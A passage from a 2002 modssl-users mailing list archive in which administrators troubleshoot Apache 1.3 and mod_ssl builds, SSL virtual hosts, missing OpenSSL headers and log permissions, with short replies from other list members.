From owner-modssl-users@modssl.org Tue Jan 1 03:10:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA12538; Tue, 1 Jan 2002 03:09:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from scn4.scn.org id DAA12528; Tue, 1 Jan 2002 03:08:27 +0100 (MET) Received: from scn.org (jj@scn [209.63.95.146]) by scn4.scn.org (8.9.1/8.9.1) with ESMTP id SAA18355 for ; Mon, 31 Dec 2001 18:03:47 -0800 (PST) Received: from localhost (jj@localhost) by scn.org (8.9.1/8.9.1) with SMTP id SAA20194 for ; Mon, 31 Dec 2001 18:10:28 -0800 (PST) Date: Mon, 31 Dec 2001 18:10:27 -0800 (PST) From: "J. Johnson" X-Sender: jj@scn To: modssl-users@modssl.org Subject: Re: [BugDB] apachectl startssl failure (PR#655) In-Reply-To: <200112290727.IAA07483@opensource.ee.ethz.ch> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "J. Johnson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Look in apachectl to see how it calls httpd in the cases of 'start' and 'startssl'. These should work out to something like 'httpd' and 'httpd -DSSL'. Try each of these directly from the command line. Possibly the second instance fails (check the return status with 'echo $?'); that would indicate a problem in the SSL section of your httpd.conf file. If those both work, check the ownership and permissions of your log directory and files. === JJ ============================================================= ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 1 05:05:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA15952; Tue, 1 Jan 2002 05:04:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ahuumrelay1.ams.ops.eu.uu.net id FAA15933; Tue, 1 Jan 2002 05:03:22 +0100 (MET) Received: from tealon (1Cust7.tnt36.rtm1.nl.uu.net [213.116.166.7]) by ahuumrelay1.ams.ops.eu.uu.net (8.11.0/8.11.0) with SMTP id g0143G113673 for ; Tue, 1 Jan 2002 04:03:16 GMT From: "Arjen Halma" To: Subject: question: is it possible to load mod ssl when apache isnt compiled whith modssl? Date: Tue, 1 Jan 2002 05:03:01 +0100 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Arjen Halma" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, Perhaps it is asked 10 thousend times, in that case sorry :) My question is: is it possible to load mod ssl when apache isnt compiled whith modssl? I have a webserver Apache, but modssl is not compiled at the time it was made. Now i want to add modssl is that possible whithout compiling a new webserver? I use Debian Thx, Arjen Halma ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 1 08:07:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA21920; Tue, 1 Jan 2002 08:06:06 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from main.aquanet.co.il id IAA21914; Tue, 1 Jan 2002 08:05:37 +0100 (MET) Received: from netmask.it (IDENT:root@ip9.elmar.co.il [192.117.252.25]) by main.aquanet.co.il (8.11.6/8.11.6) with ESMTP id g0175Yq26092 for ; Tue, 1 Jan 2002 09:05:36 +0200 Message-ID: <3C315D69.C5A12153@netmask.it> Date: Tue, 01 Jan 2002 08:55:37 +0200 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.0.36 i586) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: question: is it possible to load mod ssl when apache isnt compiled whith modssl? References: Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Arjen Halma wrote: > My question is: is it possible to load mod ssl when apache isnt compiled > whith modssl? > > I have a webserver Apache, but modssl is not compiled at the time it was > made. > > Now i want to add modssl is that possible whithout compiling a new > webserver? I use Debian If "isn't compiled with mod_ssl" means "isn't compiled with -DEAPI", then mod_ssl can work only if your Apache version is 2.0.* (well, theoretically you can port mod_ssl from the current model - zillion patches in the core of Apache - to the model that modules like mod_gzip are using, so it will not require patches in the core of Apache, but only the addition of a module. But this will be very hard to do, will take months to develop, and the result may be not as good as the current mod_ssl. And in any case, by the time you end such a project, Apache 2.0 will become the main version of Apache...). -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 1 10:11:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA25234; Tue, 1 Jan 2002 10:10:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web20206.mail.yahoo.com id KAA25202; Tue, 1 Jan 2002 10:09:04 +0100 (MET) Message-ID: <20020101090902.42840.qmail@web20206.mail.yahoo.com> Received: from [216.50.112.93] by web20206.mail.yahoo.com via HTTP; Tue, 01 Jan 2002 01:09:02 PST Date: Tue, 1 Jan 2002 01:09:02 -0800 (PST) From: Kurt Subject: undefined symbol: _OtsRemainder32Unsigned To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Kurt X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi there, I've been trying to run apache (1.3.12) and mod_ssl (2.6.6-1.3.12). Everything compiles fine, however when I attempt to run 'apachectl startssl' is says the following: [root@tokyo bin]# ./apachectl startssl Syntax error on line 208 of /usr/local/apache/conf/httpd.conf: Cannot load /usr/local/apache/libexec/libssl.so into server: /usr/local/apache/libexec/libssl.so: undefined symbol: _OtsRemainder32Unsigned ./apachectl startssl: httpd could not be started However, 'apachectl start' works just fine. 'apachectl configtest' says "Syntax OK". Line 207, 208, and 209 are as follows: LoadModule ssl_module libexec/libssl.so I've compiled mod_ssl and apache more ways than you can shake a stick at. One of the many ways i've compiled each was the following: mod_ssl: ./configure \ --with-apache=../apache_1.3.12 \ --with-ssl \ --enable-shared=ssl apache: SSL_BASE=../openssl-0.9.5a \ ./configure \ --enable-module=ssl \ --prefix=/usr/local/apache \ --enable-shared=ssl \ --enable-module=so If it makes any difference, the machine I am running and compiling on is an alpha 600. If you need any more information regarding this, please don't hesitate to ask. Thanks a bunch. __________________________________________________ Do You Yahoo!? Send your FREE holiday greetings online! http://greetings.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 1 15:20:47 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA05229; Tue, 1 Jan 2002 15:19:06 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id PAA05205; Tue, 1 Jan 2002 15:18:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from alpha.serve.net id WAA03034; Mon, 31 Dec 2001 22:28:53 +0100 (MET) Received: from serve.net (con-64-133-76-16-RIA.sprinthome.com [64.133.76.16]) by alpha.serve.net (8.11.0/8.11.0) with ESMTP id fBVLSel23665 for ; Mon, 31 Dec 2001 13:28:41 -0800 Message-ID: <3C30D887.C8CF310C@serve.net> Date: Mon, 31 Dec 2001 13:28:40 -0800 From: Robert Uzgalis X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: New User stupid problem Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Robert Uzgalis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I've just brought up the Apache ssl module and have three virtual web sites. Each virtual site comes up OK, but all the keys are the default site key. So when you go to the second or third virtual site any browser complains that the certificate doesn't match the name of the site. Any clues? BUZ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 1 15:20:49 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA05232; Tue, 1 Jan 2002 15:19:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id PAA05202; Tue, 1 Jan 2002 15:18:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from alpine.mnl.com id TAA27983; Mon, 31 Dec 2001 19:55:50 +0100 (MET) Received: (qmail 1361 invoked from network); 31 Dec 2001 18:51:54 -0000 Received: from sonic.mnl.com (HELO mozart) (63.97.246.2) by mail.mnl.com with SMTP; 31 Dec 2001 18:51:54 -0000 From: "Theodore A. Jencks" To: Subject: Mod_SSL + Apache Config Problem. Date: Mon, 31 Dec 2001 10:59:16 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Theodore A. Jencks" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm trying to get apache 1.3.22, mod_perl 1.26, mod_ssl latest and PHP to compile staticly. Mod_ssl seems to be giving an error when I try to do my final ./configure for apache. I get the following which has been posted on the list before but was not answered. I configure the apache source like this: [root@pilsner apache_1.3.22]# SSL_BASE=SYSTEM \ > EAPI_MM=SYSTEM \ > OPTIM="-O2" \ > CFLAGS="-DDYNAMIC_MODULE_LIMIT=0" \ > ./configure \ > --prefix=/home/httpd \ > --bindir=/usr/bin \ > --sbindir=/usr/sbin \ > --libexecdir=/usr/lib/apache \ > --includedir=/usr/include/apache \ > --sysconfdir=/etc/httpd/conf \ > --localstatedir=/var \ > --runtimedir=/var/run \ > --logfiledir=/var/log/httpd \ > --datadir=/home/httpd \ > --proxycachedir=/var/cache/httpd \ > --mandir=/usr/share/man \ > --enable-module=mmap_static \ > --enable-module=auth_db \ > --enable-module=rewrite \ > --enable-module=ssl \ > --enable-rule=SSL_SDBM \ > --disable-rule=SSL_COMPAT \ > --activate-module=src/modules/php4/libphp4.a \ > --enable-module=php4 \ > --activate-module=src/modules/perl/libperl.a \ > --enable-module=perl \ > --disable-module=status \ > --disable-module=userdir \ > --disable-module=negotiation \ > --disable-module=imap \ > --server-uid=www \ > --server-gid=www I get this: Configuring for Apache, Version 1.3.22 + using installation path layout: Apache (config.layout) + activated php4 module (modules/php4/libphp4.a) + activated perl module (modules/perl/libperl.a) Creating Makefile Creating Configuration.apaci in src Error: Cannot find SSL header files in any of the following dirs: Error: . /usr/include /usr/include/ssl/ /usr/local/include /usr/local/include/ssl Creating Makefile in src + configured for Linux platform + setting C compiler to gcc + setting C pre-processor to gcc -E + checking for system header files + adding selected modules o rewrite_module uses ConfigStart/End disabling DBM support for mod_rewrite (perhaps you need to add -ldbm, -lndbm or -lgdbm to EXTRA_LIBS) o db_auth_module uses ConfigStart/End using Berkeley-DB/3.x for mod_auth_db (-ldb) o ssl_module uses ConfigStart/End + SSL interface: mod_ssl/2.8.5 + SSL interface build type: OBJ + SSL interface compatibility: disabled + SSL interface experimental code: disabled + SSL interface conservative code: disabled + SSL interface vendor extensions: disabled + SSL interface plugin: Built-in SDBM + SSL library path: [SYSTEM] + SSL library version: OpenSSL 0.9.6b [engine] 9 Jul 2001 I'm using Redhat Linux 7.2 and I have the standard Openssl rpm installed. I don't know where the header files are...? Is there some sort of openssl-devel rpm I need to install before hand? Thanks to all those who reply! Regards, Theo ******************************************** Theodore A. Jencks --- Media Net Link,Inc -- 671 San Ramon Valley Blvd Danville, CA 94708 Main Phone: 925-855-9809 Direct Phone: 925-217-3632 Email: theoj@mnl.com ******************************************** ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 1 18:31:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA12663; Tue, 1 Jan 2002 18:30:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id SAA12654; Tue, 1 Jan 2002 18:30:09 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 5D4F6BD2A; Tue, 1 Jan 2002 18:31:01 +0100 (CET) Date: Tue, 1 Jan 2002 18:31:01 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Mod_SSL + Apache Config Problem. Message-ID: <20020101183101.A22851@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Dec 31, 2001 at 10:59:16AM -0800, Theodore A. Jencks wrote: > I'm using Redhat Linux 7.2 and I have the standard Openssl rpm installed. I > don't know where the header files are...? Is there some sort of > openssl-devel rpm I need to install before hand? > Yes, you have to install openssl-dev. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 1 18:33:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA12709; Tue, 1 Jan 2002 18:32:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id SAA12696; Tue, 1 Jan 2002 18:31:44 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 9D6E9BD2A; Tue, 1 Jan 2002 18:32:37 +0100 (CET) Date: Tue, 1 Jan 2002 18:32:37 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: New User stupid problem Message-ID: <20020101183237.B22851@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <3C30D887.C8CF310C@serve.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3C30D887.C8CF310C@serve.net> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Dec 31, 2001 at 01:28:40PM -0800, Robert Uzgalis wrote: > > > I've just brought up the Apache ssl module and have three virtual web > sites. > > Each virtual site comes up OK, but all the keys are the default site > key. > > So when you go to the second or third virtual site any browser complains > that the > certificate doesn't match the name of the site. > > Any clues? > Yes, RTFM - http://www.modssl.org/docs/2.8/ssl_faq.html#vhosts vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 1 18:59:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA13316; Tue, 1 Jan 2002 18:58:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anger.verticalscope.com id SAA13304; Tue, 1 Jan 2002 18:57:33 +0100 (MET) Received: by anger.verticalscope.com (Postfix, from userid 1027) id D73277E0E; Tue, 1 Jan 2002 12:58:03 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by anger.verticalscope.com (Postfix) with ESMTP id D4C9E3EC0 for ; Tue, 1 Jan 2002 12:58:03 -0500 (EST) Date: Tue, 1 Jan 2002 12:58:03 -0500 (EST) From: "Julian C. Dunn" To: Subject: weird log permission problem on SSL sites only Message-ID: <20020101124715.T12771-100000@anger.verticalscope.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm running the following: Apache/1.3.12 (Unix) mod_perl/1.26 PHP/4.0.6 mod_ssl/2.6.6 OpenSSL/0.9.6a and I have a weird problem with permissions on the access and error log files. I have a number of VirtualHosts like this: . . # some non-SSL site config TransferLog "|/path/to/cronolog -some-cronolog-options" ErrorLog "|/path/to/cronolog -some-other-cronolog-options" . . . # some SSL site config also using cronolog . And then there are a few counterparts with no SSL site (just the first VirtualHost). The problem I'm having is that whenever the virtualhost has an SSL counterpart, it looks like the Transfer and Error log files for both the SSL and non-SSL site are getting created mode 0600. If the vhost doesn't have an SSL counterpart, the logs are fine, mode 0644. It looks like for SSL sites, the umask is being set to 077 before cronolog is spawned. (I suspect 077 because new directories, as created by cronolog, are mode 0700.) The problem doesn't occur when the vhost doesn't have an SSL counterpart. Anyone have a clue as to what's going on? - Julian -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 2 00:06:31 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA23972; Wed, 2 Jan 2002 00:05:56 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from scn4.scn.org id AAA23211; Wed, 2 Jan 2002 00:04:32 +0100 (MET) Received: from scn.org (jj@scn [209.63.95.146]) by scn4.scn.org (8.9.1/8.9.1) with ESMTP id OAA02693 for ; Tue, 1 Jan 2002 14:59:50 -0800 (PST) Received: from localhost (jj@localhost) by scn.org (8.9.1/8.9.1) with SMTP id PAA11570 for ; Tue, 1 Jan 2002 15:06:33 -0800 (PST) Date: Tue, 1 Jan 2002 15:06:32 -0800 (PST) From: "J. Johnson" X-Sender: jj@scn To: modssl-users@modssl.org Subject: Re: undefined symbol: _OtsRemainder32Unsigned In-Reply-To: <20020101090902.42840.qmail@web20206.mail.yahoo.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "J. Johnson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In your libexec directory: do you even have 'libssl.so'? Either way, you probably need to look at your OpenSSL build. === JJ ============================================================= On Tue, 1 Jan 2002, Kurt wrote: > Hi there, > > I've been trying to run apache (1.3.12) and mod_ssl > (2.6.6-1.3.12). Everything compiles fine, however > when I attempt to run 'apachectl startssl' is says the > following: > > [root@tokyo bin]# ./apachectl startssl > Syntax error on line 208 of > /usr/local/apache/conf/httpd.conf: > Cannot load /usr/local/apache/libexec/libssl.so into > server: /usr/local/apache/libexec/libssl.so: undefined > symbol: _OtsRemainder32Unsigned > ./apachectl startssl: httpd could not be started > > However, 'apachectl start' works just fine. > 'apachectl configtest' says "Syntax OK". > Line 207, 208, and 209 are as follows: > > LoadModule ssl_module libexec/libssl.so > > > I've compiled mod_ssl and apache more ways than you > can shake a stick at. One of the many ways i've > compiled each was the following: > > mod_ssl: > ./configure \ > --with-apache=../apache_1.3.12 \ > --with-ssl \ > --enable-shared=ssl > > apache: > SSL_BASE=../openssl-0.9.5a \ > ./configure \ > --enable-module=ssl \ > --prefix=/usr/local/apache \ > --enable-shared=ssl \ > --enable-module=so > > If it makes any difference, the machine I am running > and compiling on is an alpha 600. If you need any > more information regarding this, please don't hesitate > to ask. > > Thanks a bunch. > > __________________________________________________ > Do You Yahoo!? > Send your FREE holiday greetings online! > http://greetings.yahoo.com > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 2 01:34:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA27107; Wed, 2 Jan 2002 01:33:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web20206.mail.yahoo.com id BAA27103; Wed, 2 Jan 2002 01:33:01 +0100 (MET) Message-ID: <20020102003259.29743.qmail@web20206.mail.yahoo.com> Received: from [216.50.112.93] by web20206.mail.yahoo.com via HTTP; Tue, 01 Jan 2002 16:32:59 PST Date: Tue, 1 Jan 2002 16:32:59 -0800 (PST) From: Kurt Subject: Re: undefined symbol: _OtsRemainder32Unsigned To: modssl-users@modssl.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Kurt X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Yes, I have libssl.so in there. Additionally, i typed: strings libssl.so | grep OtsRemainder it was in there. --- "J. Johnson" wrote: > In your libexec directory: do you even have > 'libssl.so'? > > Either way, you probably need to look at your > OpenSSL build. > > === JJ > ============================================================= > > On Tue, 1 Jan 2002, Kurt wrote: > > > Hi there, > > > > I've been trying to run apache (1.3.12) and > mod_ssl > > (2.6.6-1.3.12). Everything compiles fine, however > > when I attempt to run 'apachectl startssl' is says > the > > following: > > > > [root@tokyo bin]# ./apachectl startssl > > Syntax error on line 208 of > > /usr/local/apache/conf/httpd.conf: > > Cannot load /usr/local/apache/libexec/libssl.so > into > > server: /usr/local/apache/libexec/libssl.so: > undefined > > symbol: _OtsRemainder32Unsigned > > ./apachectl startssl: httpd could not be started > > > > However, 'apachectl start' works just fine. > > 'apachectl configtest' says "Syntax OK". > > Line 207, 208, and 209 are as follows: > > > > LoadModule ssl_module libexec/libssl.so > > > > > > I've compiled mod_ssl and apache more ways than > you > > can shake a stick at. One of the many ways i've > > compiled each was the following: > > > > mod_ssl: > > ./configure \ > > --with-apache=../apache_1.3.12 \ > > --with-ssl \ > > --enable-shared=ssl > > > > apache: > > SSL_BASE=../openssl-0.9.5a \ > > ./configure \ > > --enable-module=ssl \ > > --prefix=/usr/local/apache \ > > --enable-shared=ssl \ > > --enable-module=so > > > > If it makes any difference, the machine I am > running > > and compiling on is an alpha 600. If you need any > > more information regarding this, please don't > hesitate > > to ask. > > > > Thanks a bunch. > > > > __________________________________________________ > > Do You Yahoo!? > > Send your FREE holiday greetings online! > > http://greetings.yahoo.com > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > > User Support Mailing List > modssl-users@modssl.org > > Automated List Manager > majordomo@modssl.org > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List Manager majordomo@modssl.org __________________________________________________ Do You Yahoo!? Send your FREE holiday greetings online! http://greetings.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 2 05:22:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA04603; Wed, 2 Jan 2002 05:21:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from frustration.identityvector.net id FAA04593; Wed, 2 Jan 2002 05:20:55 +0100 (MET) Received: from localhost (freak@localhost) by frustration.identityvector.net (8.11.2/8.11.2) with ESMTP id g024KmD24031 for ; Tue, 1 Jan 2002 23:20:48 -0500 X-Authentication-Warning: frustration.identityvector.net: freak owned process doing -bs Date: Tue, 1 Jan 2002 23:20:45 -0500 (EST) From: Phil Hagen X-X-Sender: To: Subject: name-based vhost woes Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Phil Hagen X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Greetings! With the help of the mailing list archives, I've gotten SSL transactions functional on one name-based vhost, and other non-SSL vhosts working as well. I understand that I can only have one port 443 server name running on the machine. However, is it possible to have apache generate an error message of some sort when trying to https:// to one of the non-SSL vhosts? For example consider the following configurations: - - foo.com:80 - - foo.com:443 - - bar.com:80 - - bar.org:80 - - etc. With an http://foo.com, all works as expected, an https://foo.com works properly, as do http://bar.com and http://bar.org. However, when entering https://bar.com or https://bar.org, I get a warning that the server is offering a certificate for a differently-named server. If I opt to accept it anyway under NS, I get the contents of https://foo.com, though the location bar shows https://bar.com. Is it possible to have an https request to the non-SSL vhosts get killed without rolling over to the one SSL config? Thanks for the great support lists, and excellent code! - -Phil Hagen - -- http://identityvector.com/~phil/ (PGP Key, software, etc) PGP key also at http://www.keyserver.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjwyiqAACgkQ/5g75OFK7JNJuQCdHsGvuP3T4Wywsr8S8McFVDGS vBwAn1YXl2XHsDYV5l45MWMDkAHRCb2s =Qhmt -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 2 09:23:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA13674; Wed, 2 Jan 2002 09:22:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hajek.stat.ubc.ca id JAA13642; Wed, 2 Jan 2002 09:21:19 +0100 (MET) Received: from newton.stat.ubc.ca (newton.stat.ubc.ca [142.103.121.49]) by hajek.stat.ubc.ca (8.12.1/8.12.0.Beta19) with ESMTP id g028LIlD016909 for ; Wed, 2 Jan 2002 00:21:18 -0800 (PST) From: The Ha Received: (from tha@localhost) by newton.stat.ubc.ca (8.12.0.Beta7/8.12.0.Beta7) id g028L9He004677 for modssl-users@modssl.org; Wed, 2 Jan 2002 00:21:09 -0800 (PST) Message-Id: <200201020821.g028L9He004677@newton.stat.ubc.ca> Subject: No longer able to access the website (htpps) Please help... To: modssl-users@modssl.org Date: Wed, 2 Jan 2002 00:21:08 -0800 (PST) X-Mailer: ELM [version 2.5 PL4] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: The Ha X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I was able to get apache 1.3.17 /mod_ssl-2.8.0-1.3.17 working before the newyear. I then decided to remove the whole thing , download the latest apache_1.3.22 and mod_ssl-2.8.5-1.3.22, rebuild the apache server exactly like I did before. Now I can not access the https page, only the regular page I then revert to the old setup, Nothing work. What going on ? Here is my Profile Sun Solaris8 Server: Apache/1.3.22, Interface: mod_ssl/2.8.5, Library: OpenSSL/0.9.6c ssl_engine_log [01/Jan/2002 23:59:47 04557] [info] Connection to child 1 established (server newton.stat.ubc.ca:443, client 24.78.66.137) [01/Jan/2002 23:59:47 04557] [info] Seeding PRNG with 1160 bytes of entropy [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Handshake: start [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Loop: before/accept initialization [01/Jan/2002 23:59:47 04557] [trace] Inter-Process Session Cache (DBM) Expiry: old: 1, new: 1, removed: 0 [01/Jan/2002 23:59:47 04557] [trace] Inter-Process Session Cache: request=GET status=FOUND id=C7E33B8644F80F0EA47BBBE5BE875306FB60A6BADA332FA42B602AF0CC31E0A6 (session reuse) [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Loop: SSLv3 read client hello A [01/Jan/2002 23:59:47 04557] [trace] OpenSSL: Loop: 